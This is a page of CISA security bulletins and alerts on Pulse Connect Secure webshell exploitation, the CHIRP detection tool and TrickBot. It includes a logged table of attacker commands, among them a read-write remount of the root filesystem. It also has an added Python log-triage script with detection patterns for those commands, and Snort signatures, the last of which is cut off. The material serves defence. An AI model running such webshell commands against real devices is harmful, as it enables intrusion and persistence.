Security – News ENG

News, alerts and bulletins from Computer Emergency Response Teams, in English

CERT (US-CERT)
  • CISA Incident Response to SUPERNOVA Malware
    by CISA on 22 April 2021 at 2:00 pm

    Original release date: April 22, 2021
    CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advanced persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement. CISA encourages organizations to review AR21-112A for more information.
    This product is provided subject to this Notification and this Privacy & Use policy.

  • Drupal Releases Security Updates
    by CISA on 22 April 2021 at 12:53 pm

    Original release date: April 22, 2021
    Drupal has released security updates to address a vulnerability affecting Drupal 7, 8.9, 9.0, and 9.1. An attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review Drupal Advisory SA-CORE-2021-002 and apply the necessary updates or mitigations.

  • SonicWall Releases Patches for Email Security Products
    by CISA on 21 April 2021 at 3:46 pm

    Original release date: April 21, 2021
    CISA is aware of three vulnerabilities affecting SonicWall Email Security products: CVE-2021-20021, CVE-2021-20022, and CVE-2021-20023. A remote attacker could exploit these vulnerabilities to take control of an affected system. According to SonicWall, "In at least one known case, these vulnerabilities have been observed to be exploited ‘in the wild.’" CISA encourages users and administrators to review the SonicWall security advisory and apply the necessary update as soon as possible.
    Note: SonicWall released patches for CVE-2021-20021 and CVE-2021-20022 on April 9, 2021, and for CVE-2021-20023 on April 20, 2021.

  • Google Releases Security Updates for Chrome
    by CISA on 21 April 2021 at 3:35 pm

    Original release date: April 21, 2021
    Google has released Chrome version 90.0.4430.85 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

  • CISA Issues Emergency Directive on Pulse Connect Secure
    by CISA on 20 April 2021 at 10:57 pm

    Original release date: April 20, 2021
    CISA has issued Emergency Directive (ED) 21-03, as well as Alert AA21-110A, to address the exploitation of vulnerabilities affecting Pulse Connect Secure (PCS) software. An attacker could exploit these vulnerabilities to gain persistent system access and take control of the enterprise network operating the vulnerable PCS device. These vulnerabilities are being exploited in the wild.
    Specifically, ED 21-03 directs federal departments and agencies to run the Pulse Connect Secure Integrity Tool on all instances of PCS virtual and hardware appliances to determine whether any PCS files have been maliciously modified or added.
    Although ED 21-03 applies to Federal Civilian Executive Branch departments and agencies, CISA strongly recommends state and local governments, the private sector, and others to run the Pulse Connect Secure Integrity Tool and review ED 21-03: Mitigate Pulse Connect Secure Product Vulnerabilities for additional mitigation recommendations.

  • CISA Releases Alert on Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 April 2021 at 5:57 pm

    Original release date: April 20, 2021 | Last revised: April 21, 2021
    CISA is aware of ongoing exploitation of Ivanti Pulse Connect Secure vulnerabilities compromising U.S. government agencies, critical infrastructure entities, and private sector organizations. In response, CISA has released Alert AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities, as well as Emergency Directive (ED) 21-03, to offer technical details regarding this activity. Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to follow the guidance in Alert AA21-110A, which includes:
    - Running the Pulse Connect Secure Integrity Tool
    - Updating their Pulse Connect Secure appliance to the latest software version
    - Implementing the mitigation provided by Ivanti Pulse Secure (if evidence of compromise is found)
    For additional information regarding this ongoing exploitation, see the FireEye blog post: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day and the CERT Coordination Center (CERT/CC) Vulnerability Note VU#213092.

  • Oracle Releases April 2021 Critical Patch Update
    by CISA on 20 April 2021 at 5:22 pm

    Original release date: April 20, 2021
    Oracle has released its Critical Patch Update for April 2021 to address 384 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the Oracle April 2021 Critical Patch Update and apply the necessary updates.

  • AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 April 2021 at 3:03 pm

    Original release date: April 20, 2021 | Last revised: April 22, 2021

    Summary
    The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA has assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool.
    To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.
    Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Pulse Secure Connect Integrity Tool, update to the latest software version, and investigate for malicious activity.

    Technical Details
    On March 31, 2021, Ivanti released the Pulse Secure Connect Integrity Tool to check the integrity of Pulse Connect Secure appliances. Their technical bulletin states:
        We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE-2020-8260). For more information visit KB44764 (Customer FAQ).
    The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:
    - DSUpgrade.pm (MD5: 4d5b410e1756072a701dfd3722951907): runs arbitrary commands passed to it; copies malicious code into Licenseserverproto.cgi
    - Licenseserverproto.cgi (MD5: 9b526db005ee8075912ca6572d69a5d6): copies malicious logic to the new files during the patching process, allowing for persistence
    - Secid_canceltoken.cgi (MD5: f2beca612db26d771fe6ed7a87f48a5a): runs arbitrary commands passed via HTTP requests
    - compcheckresult.cgi (MD5: ca0175d86049fa7c796ea06b413857a3): publicly-facing page to send arbitrary commands with ID argument
    - Login.cgi (MD5: 56e2a1566c7989612320f4ef1669e7d5): allows for credential harvesting of authenticated users
    - Healthcheck.cgi (MD5: 8c291ad2d50f3845788bc11b2f603b4a): runs arbitrary commands passed via HTTP requests
    Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log in the following format (URIs have been redacted to minimize access to webshells that may still be active):
        Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
    The threat actor then ran the commands listed in table 1 via the webshell.

    Table 1: Commands run via webshell
    Time                          Command
    2021-01-19T07:46:05.000+0000  pwd
    2021-01-19T07:46:24.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T08:10:13.000+0000  cat%20/home/webserver/htdocs/dana-na/l[redacted]
    2021-01-19T08:14:18.000+0000  See Appendix.
    2021-01-19T08:15:11.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T08:15:49.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T09:03:05.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T09:04:47.000+0000  $mount
    2021-01-19T09:05:13.000+0000  /bin/mount%20-o%20remount,rw%20/dev/root%20/
    2021-01-19T09:07:10.000+0000  $mount

    The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

    Mitigations
    CISA strongly urges organizations using Pulse Secure devices to immediately:
    - Review the Pulse Secure Connect Integrity Tool Quick Start Guide and Customer FAQs.
    - Run the Pulse Secure Connect Integrity Tool. The tool requires a reboot. If virtualized, take a snapshot before running. If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions. Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed.
    - Implement the mitigations released by the vendor. According to Ivanti Pulse Secure, the interim XML configurations listed in the "Workaround" section of SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893) provide significant protection against threat actor activity.
    - Update to the latest software version, which contains security enhancements, per the process outlined on Ivanti Pulse Secure’s website.
    If the Integrity Checker Tool finds mismatched or unauthorized files, CISA urges organizations to:
    - Contact CISA to report your findings (see Contact Information section below).
    - Contact Ivanti Pulse Secure for assistance in capturing forensic information.
    - Review the “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
    - Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts, and any accounts that could be modified by any account described above; all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
    - Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool.
    - Look for unauthorized applications and scheduled tasks in their environment.
    - Ensure no new administrators were created or non-privileged users were added to privileged groups.
    - Remove any remote access programs not approved by the organization.
    - Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.
    In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files should consider the guidance in KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements, which includes: After preservation, you can remediate your Pulse Connect Secure appliance by:
    1. Disabling the external-facing interface.
    2. Saving the system and user config.
    3. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console).
    4. Updating the appliance to the newest version.
    5. Re-importing the saved config.
    6. Re-enabling the external interface.
    CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Pulse Secure Connect Integrity Tool again after remediation has taken place.

    Contact Information
    CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:
    - 1-888-282-0870 (from outside the United States: +1-703-235-8832)
    - central@cisa.dhs.gov (UNCLASS)
    - us-cert@dhs.sgov.gov (SIPRNET)
    - us-cert@dhs.ic.gov (JWICS)
    CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.
    Appendix: Large sed Command Found In Unauthenticated Logs

    References
    - FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day
    - CERT/CC Vulnerability Note VU#213092: Pulse Connect Secure vulnerable to authentication bypass

    Revisions
    - April 20, 2021: Initial version
    - April 21, 2021: Added CERT/CC Vulnerability Note to References
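Detection logic for the Unauthenticated Requests Log format quoted in the alert above, added here as an example and not CISA's or Ivanti's code: it parses constructed log lines, URL-decodes the command carried in the id= parameter and matches it against the command patterns reported in Table 1 and the appendix. The sample lines, the documentation IP addresses and the pattern labels are constructed for illustration.

```python
"""Triage of Pulse Connect Secure 'Unauthenticated Requests' log lines.

Added example (not CISA's or Ivanti's code). It parses the log line format
quoted in AA21-110A, URL-decodes the command carried in the id= parameter
and matches it against the command patterns the alert reports (Table 1 and
the appendix).
"""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed sample lines in the AA21-110A format. IPs are RFC 5737
# documentation addresses and URIs are redacted as in the alert; none of
# these values are real indicators.
SAMPLE_LOG = """\
Unauthenticated request url /dana-na/auth/url_default/welcome.cgi came from IP 203.0.113.10.
Unauthenticated request url /dana-na/[redacted]?id=pwd came from IP 203.0.113.10.
Unauthenticated request url /dana-na/[redacted]?id=cat%20/home/webserver/htdocs/dana-na/[redacted] came from IP 203.0.113.10.
Unauthenticated request url /dana-na/[redacted]?id=%24mount came from IP 198.51.100.7.
Unauthenticated request url /dana-na/[redacted]?id=/bin/mount%20-o%20remount,rw%20/dev/root%20/ came from IP 198.51.100.7.
Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20[redacted]%20/home/webserver/htdocs/dana-na/[redacted] came from IP 198.51.100.7.
"""

LINE_RE = re.compile(
    r"Unauthenticated request url (?P<url>\S+) came from IP (?P<ip>\S+?)\.?$"
)

# Patterns drawn from the commands the alert reports being run through the
# webshell: shell enumeration, reading and editing CGI files under htdocs,
# and remounting the root filesystem read-write so that edits persist.
PATTERNS = [
    ("shell enumeration command", re.compile(r"^\$?(pwd|mount)$")),
    ("reads CGI content under htdocs", re.compile(r"\bcat\b.*/home/webserver/htdocs/")),
    ("edits files in place under htdocs", re.compile(r"\bsed\s+-i\b.*/home/webserver/htdocs/")),
    ("remounts root filesystem read-write", re.compile(r"\bmount\b.*\bremount,rw\b")),
]


@dataclass
class Finding:
    ip: str
    path: str
    command: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Any command reaching a dana-na CGI through id= deserves review; a
        # pattern known from the alert raises it to high.
        return "high" if self.reasons else "review"


def extract_command(url: str):
    """Return the URL-decoded value of the id= query parameter, or None."""
    _, _, query = url.partition("?")
    for pair in query.split("&"):
        key, sep, value = pair.partition("=")
        if sep and key == "id":
            # unquote (not unquote_plus): a literal '+' in a command must survive.
            return unquote(value)
    return None


def parse_line(line: str):
    """Parse one log line; return a Finding when a command was passed via id=."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = m.group("url")
    command = extract_command(url)
    if command is None:
        return None
    path = url.partition("?")[0]
    reasons = [label for label, rx in PATTERNS if rx.search(command)]
    return Finding(m.group("ip"), path, command, reasons)


def triage(log_text: str):
    """Return all findings from a block of log text, in file order."""
    findings = []
    for line in log_text.splitlines():
        finding = parse_line(line)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ip} {f.path} -> {f.command!r} {f.reasons}")
```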

  • VMware Releases Security Update
    by CISA on 20 April 2021 at 2:00 pm

    Original release date: April 20, 2021
    VMware has released a security update to address a vulnerability affecting NSX-T. An attacker can exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review VMSA-2021-0006 and apply the necessary update and workaround.

  • Mozilla Releases Security Update for Firefox, Firefox ESR, and Thunderbird
    by CISA on 20 April 2021 at 1:59 pm

    Original release date: April 20, 2021
    Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker can exploit some of these vulnerabilities to take control of an affected system. CISA encourages users and administrators to review the Mozilla Security Advisories for Firefox 88, Firefox ESR 78.10, and Thunderbird 78.10, and apply the necessary updates.

  • WordPress Releases Security and Maintenance Update
    by CISA on 16 April 2021 at 4:46 pm

    Original release date: April 16, 2021
    WordPress versions 4.7-5.7 are affected by multiple vulnerabilities. An attacker could exploit one of these vulnerabilities to take control of an affected website. CISA encourages users and administrators to review the WordPress Security and Maintenance Release and upgrade to WordPress 5.7.1.

  • AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool
    by CISA on 18 March 2021 at 6:00 pm

    Original release date: March 18, 2021 | Last revised: April 15, 2021

    Summary
    Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise.
    This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:
    - AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.
    - AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.
    Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment. In this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment. CHIRP is freely available on the CISA GitHub Repository. For additional guidance watch CISA's CHIRP Overview video.
    Note: CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.
    CISA advises organizations to use CHIRP to:
    - Examine Windows event logs for artifacts associated with this activity;
    - Examine Windows Registry for evidence of intrusion;
    - Query Windows network artifacts; and
    - Apply YARA rules to detect malware, backdoors, or implants.
    Network defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support.
    Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.

    Technical Details
    How CHIRP Works
    CHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts AA20-352A and AA21-008A. Currently, the tool looks for:
    - The presence of malware identified by security researchers as TEARDROP and RAINDROP;
    - Credential dumping certificate pulls;
    - Certain persistence mechanisms identified as associated with this campaign;
    - System, network, and M365 enumeration; and
    - Known observable indicators of lateral movement.
    Network defenders can follow step-by-step instructions on the CISA CHIRP GitHub repository to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.
    Compatibility
    CHIRP currently only scans Windows operating systems.
    Instructions
    CHIRP is available on CISA’s GitHub repository in two forms:
    - A compiled executable
    - A Python script
    CISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository. If you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.

    Mitigations
    Interpreting the Results
    CHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support.
    Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.
    Frequently Asked Questions
    - What systems should CHIRP run on? Systems running SolarWinds Orion or believed to be involved in any resulting lateral movement.
    - What should I do with results? Ingest the JSON results into a SIEM system, web browser, or text editor.
    - Are there existing tools that CHIRP complements and/or that provide the same benefit as CHIRP? Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning on-premises systems for similar activity.
    - How often should I run CHIRP? CHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.
    - Do I need to configure the tool before I run it? No.
    - Will CHIRP change or affect anything on the system(s) it runs on? No, CHIRP only scans the system(s) it runs on and makes no active changes.
    - How long will it take to run CHIRP? CHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.
    - If I have questions, who do I contact? For general questions regarding CHIRP, please contact CISA via email at central@cisa.dhs.gov or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at https://us-cert.cisa.gov/report. For all technical issues or support for CHIRP, please submit issues at the CISA CHIRP GitHub Repository.

    Revisions
    - March 18, 2021: Initial Publication
    - April 9, 2021: Fixed PDF (not related to content)
    - April 15, 2021: Updated with Attribution Statement

  • AA21-076A: TrickBot Malware
    by CISA on 17 March 2021 at 3:00 pm

    Original release date: March 17, 2021 | Last revised: March 24, 2021

    Summary
    This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.
    The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.
    TrickBot—first identified in 2016—is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.
    To secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.

    Technical Details
    TrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which—if enabled—execute malware (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system.
    Attackers can use TrickBot to:
    - Drop other malware, such as Ryuk and Conti ransomware, or
    - Serve as an Emotet downloader.[1]
    TrickBot uses person-in-the-browser attacks to steal information, such as login credentials (Man in the Browser [T1185]). Additionally, some of TrickBot’s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (Reconnaissance [TA0043]), to trying to manipulate, interrupt, or destroy systems and data (Impact [TA0040]).
    TrickBot is capable of data exfiltration, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Gather Victim Host Information: Firmware [T1592.003]).[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks. Figure 1 lays out TrickBot’s use of enterprise techniques.
    [Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot]

    MITRE ATT&CK Techniques
    According to MITRE, TrickBot [S0266] uses the ATT&CK techniques listed in table 1.

    Table 1: TrickBot ATT&CK techniques for enterprise (Technique Title, ID, Use)

    Reconnaissance [TA0043]
    - Gather Victim Host Information: Firmware (T1592.003): TrickBot is capable of host enumeration such as reconnaissance of UEFI/BIOS firmware.

    Initial Access [TA0001]
    - Phishing: Spearphishing Attachment (T1566.001): TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware.
    - Phishing: Spearphishing Link (T1566.002): TrickBot has been delivered via malicious links in phishing emails.

    Execution [TA0002]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Command and Scripting Interpreter: Windows Command Shell (T1059.003): TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.
    - Native API (T1106): TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow.
    - User Execution: Malicious Link (T1204.001): TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link.
    - User Execution: Malicious File (T1204.002): TrickBot has attempted to get users to launch malicious documents to deliver its payload.

    Persistence [TA0003]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Create or Modify System Process: Windows Service (T1543.003): TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

    Privilege Escalation [TA0004]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Process Injection: Process Hollowing (T1055.012): TrickBot injects into the svchost.exe process.
    - Create or Modify System Process: Windows Service (T1543.003): TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

    Defense Evasion [TA0005]
    - Obfuscated Files or Information (T1027): TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.
    - Obfuscated Files or Information: Software Packing (T1027.002): TrickBot leverages a custom packer to obfuscate its functionality.
    - Masquerading (T1036): The TrickBot downloader has used an icon to appear as a Microsoft Word document.
    - Process Injection: Process Hollowing (T1055.012): TrickBot injects into the svchost.exe process.
    - Modify Registry (T1112): TrickBot can modify registry entries.
    - Deobfuscate/Decode Files or Information (T1140): TrickBot decodes the configuration data and modules.
    - Subvert Trust Controls: Code Signing (T1553.002): TrickBot has come with a signed downloader component.
    - Impair Defenses: Disable or Modify Tools (T1562.001): TrickBot can disable Windows Defender.

    Credential Access [TA0006]
    - Input Capture: Credential API Hooking (T1056.004): TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
    - Unsecured Credentials: Credentials in Files (T1552.001): TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials.
    - Unsecured Credentials: Credentials in Registry (T1552.002): TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key.
    - Credentials from Password Stores (T1555): TrickBot can steal passwords from the KeePass open-source password manager.
    - Credentials from Password Stores: Credentials from Web Browsers (T1555.003): TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.

    Discovery [TA0007]
    - System Service Discovery (T1007): TrickBot collects a list of installed programs and services on the system’s machine.
    - System Network Configuration Discovery (T1016): TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.
    - Remote System Discovery (T1018): TrickBot can enumerate computers and network devices.
    - System Owner/User Discovery (T1033): TrickBot can identify the user and groups the user belongs to on a compromised host.
    - Permission Groups Discovery (T1069): TrickBot can identify the groups the user on a compromised host belongs to.
    - System Information Discovery (T1082): TrickBot gathers the OS version, machine name, CPU type, and amount of RAM available from the victim’s machine.
    - File and Directory Discovery (T1083): TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.
    - Account Discovery: Local Account (T1087.001): TrickBot collects the users of the system.
    - Account Discovery: Email Account (T1087.003): TrickBot collects email addresses from Outlook.
    - Domain Trust Discovery (T1482): TrickBot can gather information about domain trusts by utilizing Nltest.

    Collection [TA0009]
    - Data from Local System (T1005): TrickBot collects local files and information from the victim’s local machine.
    - Input Capture: Credential API Hooking (T1056.004): TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
    - Person in the Browser (T1185): TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage.

    Command and Control [TA0011]
    - Fallback Channels (T1008): TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers.
    - Application Layer Protocol: Web Protocols (T1071.001): TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic, and various configuration files.
    - Ingress Tool Transfer (T1105): TrickBot downloads several additional files and saves them to the victim's machine.
Data Encoding: Standard Encoding T1132.001 TrickBot can Base64-encode C2 commands. Non-Standard Port T1571 Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. Encrypted Channel: Symmetric Cryptography T1573.001 TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic. Exfiltration [TA0010] Technique Tactic ID Use Exfiltration Over C2 Channel T1041 TrickBot can send information about the compromised host to a hardcoded C2 server. Detection Signatures CISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.   alert tcp any [443,447] -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|0b|example.com"; fast_pattern:only; content:"Global Security"; content:"IT Department"; pcre:"/(?:\x09\x00\xc0\xb9\x3b\x93\x72\xa3\xf6\xd2|\x00\xe2\x08\xff\xfb\x7b\x53\x76\x3d)/"; classtype:bad-unknown; metadata:service ssl,service and-ports;)   alert tcp any any -> any $HTTP_PORTS (msg:"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'"; sid:1; rev:1; flow:established,to_server; content:"/anchor"; http_uri; fast_pattern:only; content:"GET"; nocase; http_method; pcre:"/^\/anchor_?.{3}\/[\w_-]+\.[A-F0-9]+\/?$/U"; classtype:bad-unknown; priority:1; metadata:service http;)   alert tcp any $SSL_PORTS -> any any (msg:"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:"|31 0b 30 09 06 03 55 04 06 13 02|XX"; nocase; content:"|31 15 30 13 06 03 55 04 07 13 0c|Default City"; nocase; content:"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd"; nocase; content:!"|31 0c 30 0a 06 03 55 04 03|"; classtype:bad-unknown; 